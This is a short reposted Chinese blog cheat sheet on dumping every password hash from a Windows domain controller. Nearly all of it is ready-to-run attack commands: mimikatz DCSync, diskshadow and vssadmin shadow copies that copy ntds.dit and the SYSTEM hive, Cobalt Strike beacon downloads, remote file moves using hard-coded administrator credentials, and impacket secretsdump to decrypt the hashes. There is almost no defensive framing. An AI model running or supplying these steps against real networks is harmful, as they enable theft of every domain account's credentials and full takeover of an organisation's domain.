【域滲透】Windows域控導出hash

本文轉載自查看原文 2019-07-25 11:16 463

一、dcsync導入域內所有hash

mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.local /all /csv exit"

二、利用diskshadow 之前需要先切換到 system32 目錄下

diskshadow.exe
set context persistent nowriters
add volume c: alias stack
create
expose %stack% z: DISKSHADOW> exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\windows\temp\ntds.dit
delete shadows all
list shadows all
reset DISKSHADOW> exit
reg save hklm\system c:\windows\temp\system.hive

beacon> download ntds.dit beacon> download system.hive beacon> downloads

三、將兩個文件從域控托回被控機

net use \\192.168.75.129\c$ /user:"yiwang\Administrator" "admin123"

move \\192.168.75.129\admin$\temp\ntds.dit c:\windows\temp\

move \\192.168.75.129\admin$\temp\system.hive c:\windows\temp\

net use * /del /yes

mpacket中用 secretsdump.py腳本進行解密

python secretsdump.py -system system.hive -ntds ntds.dit LOCAL >>hash.txt

四、vssadmin離線導入hash

vssadmin list shadows
vssadmin create shadow /for=c:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy65\windows\NTDS\ntds.dit c:\windows\temp\ntds.dit
vssadmin delete shadows /for=c: /quiet
esentutl /p /o c:\windows\temp\ntds.dit
reg save hklm\system c:\windows\temp\system.hive

參考：

https://xz.aliyun.com/t/2527#toc-1

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 域滲透之導出域Hash 內網滲透之域控查找域滲透——獲取域控.md 域滲透：pth(pass the hash) 【CTF】msf和impacket聯合拿域控內網滲透-拿域控 Windows域橫向滲透離線提取域控HASH的方法【內網滲透系列】內網靶場之輕松拿下域控--突破安全策略接管域控 [域滲透-內網滲透] 從 web 到域控，你未曾設想的攻擊鏈 Windows Server 2012 域控搭建